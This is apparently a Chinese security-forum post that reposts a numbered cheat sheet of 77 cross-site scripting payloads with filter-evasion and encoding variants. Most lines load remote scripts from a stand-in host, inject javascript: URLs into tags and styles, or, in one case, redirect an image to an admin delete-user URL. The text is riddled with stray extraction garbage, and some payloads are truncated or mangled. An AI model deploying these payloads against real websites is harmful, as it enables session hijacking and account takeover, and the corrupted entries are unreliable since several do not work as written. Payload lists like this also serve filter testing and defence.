貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。, V" j7 f! w+ i n: b$ f
(1)普通的XSS JavaScript注入* x$ G& }; \: D/ W! ]1 F
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 u/ n* F9 y+ X/ X, _9 ?% Q(2)IMG标签XSS使用JavaScript命令4 l; r) m( X! W. T1 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- {5 M# v/ r) b4 Z; O(3)IMG标签无分号无引号
5 s: l9 m8 w$ W<IMG SRC=javascript:alert(‘XSS’)># b# J! \2 W; N. o" G# U
(4)IMG标签大小写不敏感
O7 c0 Y/ }. q: L# }<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* I! J4 \( u8 j& J. u! }(5)HTML编码(必须有分号): q# O6 f) [4 ]8 O3 G# j
<IMG SRC=javascript:alert(“XSS”)>0 b1 Q. w5 [! k6 Z
(6)修正缺陷IMG标签
( K; U* S0 S y8 d& e$ r<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# V2 B8 B, E' G3 C; ?9 G: m5 H+ H' ~6 h
; i# I! l. k. y6 \/ E* F
(7)formCharCode标签(计算器)) z! Y7 h7 Y7 ~* p
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" g6 o' H9 o& Z
(8)UTF-8的Unicode编码(计算器)
; v+ V& v) k8 L9 F: U- F# b+ O<IMG SRC=jav..省略..S')>" h* c& K- P" \8 a# m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" v& @' m0 `/ I% `/ k4 `$ H<IMG SRC=jav..省略..S')>9 z: r% w9 e' P- c8 a
(10)十六进制编码也是没有分号(计算器)
) k# t8 n% V1 |% m<IMG SRC=java..省略..XSS')>/ W, W3 I6 {/ O/ X$ \1 a
(11)嵌入式标签,将Javascript分开; Z3 v- a+ w6 u, o2 l* R
<IMG SRC=”jav ascript:alert(‘XSS’);”>: ~& y0 c$ U, T. h
(12)嵌入式编码标签,将Javascript分开
0 s/ w3 h. \1 f8 T% r( H: g5 x<IMG SRC=”jav ascript:alert(‘XSS’);”>0 O! B# i; L2 J# s3 d
(13)嵌入式换行符
/ b) ^( L0 T6 P1 I! f<IMG SRC=”jav ascript:alert(‘XSS’);”>0 G! Z5 X0 a) m, T, ~/ C4 y
(14)嵌入式回车
! _) R. i% N% E; m6 }" w<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 C, C( w' \' k k(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ R4 s) q' C! J3 k7 m- j; U
<IMG SRC=”javascript:alert(‘XSS‘)”>' g( M9 g N# L& j" L
(16)解决限制字符(要求同页面)# K, m/ K& _7 X* C- j& O' r! m" Q
<script>z=’document.’</script>
( Q& |: R0 c' u8 ~6 P& \6 Y" O<script>z=z+’write(“‘</script>3 W) ^* @3 T+ a
<script>z=z+’<script’</script>
" J) B3 B. Z; t6 ]% J3 X7 f: q<script>z=z+’ src=ht’</script>
& q5 U' o; i# l3 ?8 k8 \<script>z=z+’tp://ww’</script>
. W. ]. W' G0 n) v<script>z=z+’w.shell’</script>& ~, b/ y6 c3 j5 p" K
<script>z=z+’.net/1.’</script>, I- t1 a, C# m) O7 Z1 b
<script>z=z+’js></sc’</script>
2 P* i; K, w3 P$ L<script>z=z+’ript>”)’</script>
7 }$ F; z; p. n* o& m- R% x<script>eval_r(z)</script>/ g: B' i; i8 S* l. p
(17)空字符12-7-1 T00LS - Powered by Discuz! Board0 q' ]! ]. o5 L$ l4 ]3 R9 D& y( g
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
0 F" Y. j- h8 V$ Eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out" ]% t, k( X* h- u
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 C, e- M& f8 D! ]+ ~3 xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 g) r& n# P9 o) U: y0 } V
(19)Spaces和meta前的IMG标签
' p( C( H/ x2 d0 R7 I# U<IMG SRC=” javascript:alert(‘XSS’);”>5 q+ L% c, _ H+ n' G* d9 Q
(20)Non-alpha-non-digit XSS
4 N' c' |, T2 a/ E( |5 }<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" o/ P/ W+ ~, b# Y& H" k(21)Non-alpha-non-digit XSS to 2, p# r2 D. b) a$ e
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! O0 K6 G( h& z& H% z(22)Non-alpha-non-digit XSS to 3
/ K2 u+ k- e* Z, A: p<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! I4 A$ g8 C: V: s0 e3 w
(23)双开括号8 E+ ^& n+ {% P% j
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* u; ^* V7 e9 G) B! J2 S y(24)无结束脚本标记(仅火狐等浏览器)7 q2 [2 w+ @5 H' [
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: x) T% y( v/ E& ~, X5 ?
(25)无结束脚本标记2
2 ]" d' p O$ B, q<SCRIPT SRC=//3w.org/XSS/xss.js>% w' z- J* ?- f/ o
(26)半开的HTML/JavaScript XSS
3 ?* A; _5 h$ `+ @<IMG SRC=”javascript:alert(‘XSS’)”0 K7 j5 z: x6 N/ m+ k- |( D% h2 i: c
(27)双开角括号) ^; f# M& {2 |+ [1 K9 n0 I4 d
<iframe src=http://3w.org/XSS.html < w* l9 Z! S1 ~7 C8 J8 r
(28)无单引号 双引号 分号. [ b* R# e" l
<SCRIPT>a=/XSS/( H* w( I- i z, M5 E
alert(a.source)</SCRIPT>
, h( r1 [* e. f( d! i8 I' i(29)换码过滤的JavaScript
) V* Q) t* q: `" K: x\”;alert(‘XSS’);//( Y: a# B& X+ i; i
(30)结束Title标签) h$ s$ ?9 v$ S2 u# g8 z9 v
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>5 C D, l+ G7 a2 L7 d+ T' |0 A
(31)Input Image9 [ X7 N9 h0 Z
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 b$ ~8 N7 s8 U(32)BODY Image
9 `2 K/ e: X# V. U5 v<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ J# m. i! o% F& p/ I# v/ M(33)BODY标签; g3 _9 l: E! m8 q" a5 \3 k2 }
<BODY(‘XSS’)>
7 u g; c, I* G( h5 z(34)IMG Dynsrc
" y2 o: U* w% d( c" d& S, ]<IMG DYNSRC=”javascript:alert(‘XSS’)”>% K1 E. c- _/ g) Y+ {
(35)IMG Lowsrc
# x3 n& e3 n7 R$ f7 z<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% Z, m; b. ~0 D4 E( R' l+ q; x(36)BGSOUND* I$ m8 G: ^2 J. o' u% b
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 Z6 g0 a- C& t9 y' {5 |(37)STYLE sheet
5 H# t' a% {' D% L8 x<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% x3 `! G* G6 X$ B* r* r
(38)远程样式表
M; S( }! J7 ^/ h<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; e* j+ D& A' ]" _" [(39)List-style-image(列表式)
- N w0 c" S$ r" e<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& b ]5 d7 d5 I6 M0 h& X: p& ]' T(40)IMG VBscript
8 V: t4 B$ E S- L: _4 A9 a<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, M- M1 J: P" T
(41)META链接url
1 f6 @) _1 P$ v- B3 G5 v) H* M: {( L: O5 y' p
2 x$ n* X6 q8 l* W% r: Q$ N; Q8 X' h<META HTTP-EQUIV=”refresh” CONTENT=”0;
% [3 ]2 k4 q4 V& H& h. y, ^& m- W/ OURL=http://;URL=javascript:alert(‘XSS’);”> P8 @/ g* |6 e2 O" I
(42)Iframe# h2 v( L* P& C9 ^+ i6 j. }) `
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>" J2 \7 {5 d% A# h0 [; i9 }
(43)Frame
6 k8 ?; P2 H3 I/ a- Q" W; o<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
7 o% t" ]( Q4 d6 x0 ^https://www.t00ls.net/viewthread ... table&tid=15267 3/6* D+ Y" p, c4 p
(44)Table) h- q# M+ `2 w- X; O0 B- T
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 R) `$ k. H6 x0 L! }1 w
(45)TD
1 S1 D6 r& x- u# n4 @<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 n) c2 \. b7 W6 P
(46)DIV background-image1 i( r7 p# e0 G/ K/ e, ]! {
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" _# X7 g( y1 p: a: @# x(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-2 }3 p) L; D3 Y9 c& J5 N' Z
8&13&12288&65279)
& G# o/ D \! [$ m3 F; l! @<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" h3 I* u$ f/ @1 H(48)DIV expression
) H( ~7 A2 t1 k$ h5 o# \. x. \2 q<DIV STYLE=”width: expression_r(alert(‘XSS’));”>( n8 K: S0 R1 G' Q- [
(49)STYLE属性分拆表达- t6 y8 Z# Q3 l$ {; F$ y% X# s9 I% p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; S. [# B6 t! |5 G: _(50)匿名STYLE(组成:开角号和一个字母开头)4 q) P# C5 a& a' A! U
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ f1 M4 K# |4 n! L7 `" m0 a5 r( d
(51)STYLE background-image+ T& ~. z ?. g* f9 a
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
/ t5 Q! e* M/ n# e: Z/ mCLASS=XSS></A>: f1 F" x, i! x4 ~& f& t
(52)IMG STYLE方式6 \+ P" P p9 _' a- B1 N
exppression(alert(“XSS”))’>4 c. ?3 g3 c8 g
(53)STYLE background
( O4 F" p( l4 h3 \- e! A<STYLE><STYLE) C+ v1 W. }$ g2 `0 e9 o
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>. Z& L4 k6 t2 Q: {4 _6 |
(54)BASE
' u' u: V% q. s# j7 r* u<BASE HREF=”javascript:alert(‘XSS’);//”>
/ @& C- j/ y) e: q( O4 H* }(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 i5 u9 P8 K; M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>! ?! T4 e2 `5 d, ~" ]7 d. V7 L
(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 F# v; ]4 v; la=”get”;
- J. B1 ?. y+ \" @8 l! t' h0 _b=”URL(\”";& n( a6 O% z5 h
c=”javascript:”;: {1 y9 t% w" z3 x+ Z
d=”alert(‘XSS’);\”)”;* J/ J& G! W# o5 b
eval_r(a+b+c+d);
6 S1 K" W3 i! h4 ]& Z: \, k' ^(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上3 q8 n9 d# R0 V
<HTML xmlns:xss>& h3 n; F# E9 z$ [4 m; x G
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
0 g2 ^& p, D+ \! w$ ?<xss:xss>XSS</xss:xss>
: t) d$ |& X' b$ U2 }" m</HTML>7 u9 P# c; j2 [- W' s& K- f; [; m
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
4 [5 q, I2 @/ w$ V, U- O+ p<SCRIPT SRC=””></SCRIPT>
$ b! X W3 T* p" P7 D- m& o/ ^' u(59)IMG嵌入式命令,可执行任意命令" n7 v9 Q0 d+ [6 m: k
<IMG SRC=”http://www.XXX.com/a.php?a=b”> @2 n7 k! J$ x- T8 W1 m* d
(60)IMG嵌入式命令(a.jpg在同服务器)3 I0 q3 W& A1 Q5 A& m* z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser' R/ A2 D. y9 O$ R3 }
(61)绕符号过滤8 N* k& v8 \" X1 {! p7 g+ Z
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! N# r7 K- ^) K(62)
1 [1 k7 I) @6 Q3 s<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 c0 z& R* V/ l. @5 r2 t0 s
(63)
* @) T6 P) T/ P. \, F' u* g<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ \1 V |& N6 O6 `$ p
(64): t- x/ u1 [6 j- e2 k. C
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
9 D! C. k/ W0 C% I, }4 t(65)8 K" b4 n% c4 H9 Y6 [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 Y& M) l$ w6 ]4 `; T: u(66)12-7-1 T00LS - Powered by Discuz! Board- a9 i1 r9 \; D; Y0 n
https://www.t00ls.net/viewthread ... table&tid=15267 4/6" ]( T' |. H) v' h/ P- a2 m
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
, ?0 S0 W2 ]) o. f(67)
+ c$ N8 y+ m! A7 M' h# i<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>" z; F* H: Y! O' K
</SCRIPT>8 ~( m# v7 ~0 h6 C* T& K: u
(68)URL绕行* Y' O' @8 r" v5 @0 ^
<A HREF=”http://127.0.0.1/”>XSS</A>9 z- M" N& U4 F- c1 [" u
(69)URL编码
" ~# @" J m0 h( E! {. `<A HREF=”http://3w.org”>XSS</A>) y. s5 j8 R, A6 R% ~
(70)IP十进制& }% B J8 R* \5 \, O0 m5 k
<A HREF=”http://3232235521″>XSS</A>
1 w# c6 i; t, X+ F t4 L(71)IP十六进制" S$ U w3 L# T
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>6 z5 k; n- f! [6 \3 @
(72)IP八进制
c6 V# B: H, @0 o ]1 I* J/ U- B<A HREF=”http://0300.0250.0000.0001″>XSS</A>) n/ Z$ D; L& c6 d) b
(73)混合编码
/ B& |2 m7 ?$ R8 F+ U<A HREF=”h
! h, g _6 }8 L, s1 U1 R& `7 ltt p://6 6.000146.0×7.147/”">XSS</A>- V# b1 ^; p$ \; f8 \
(74)节省[http:]
7 |: H* O5 G' k R- ^( Y<A HREF=”//www.google.com/”>XSS</A>( Q$ r( w( J* S
(75)节省[www]
. ]4 x+ n1 q# J' r<A HREF=”http://google.com/”>XSS</A>
9 T% O* V1 f) t: L- i5 w(76)绝对点绝对DNS" U9 @( d) g8 ~( S/ k- K; K
<A HREF=”http://www.google.com./”>XSS</A>$ s7 w8 C5 M1 L: ^& R$ [
(77)javascript链接/ ^1 m3 E" A( u. \4 {% Y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>9 H. Y. Q3 b' Q6 f! {( y
* B1 U) _! c$ J原文地址:http://fuzzexp.org/u/0day/?p=14
& m+ Z) l! I- j' ]0 O# R# T0 E6 L6 B7 z' O/ n
|
发表于 2013-4-19 19:22:37
收藏
支持
反对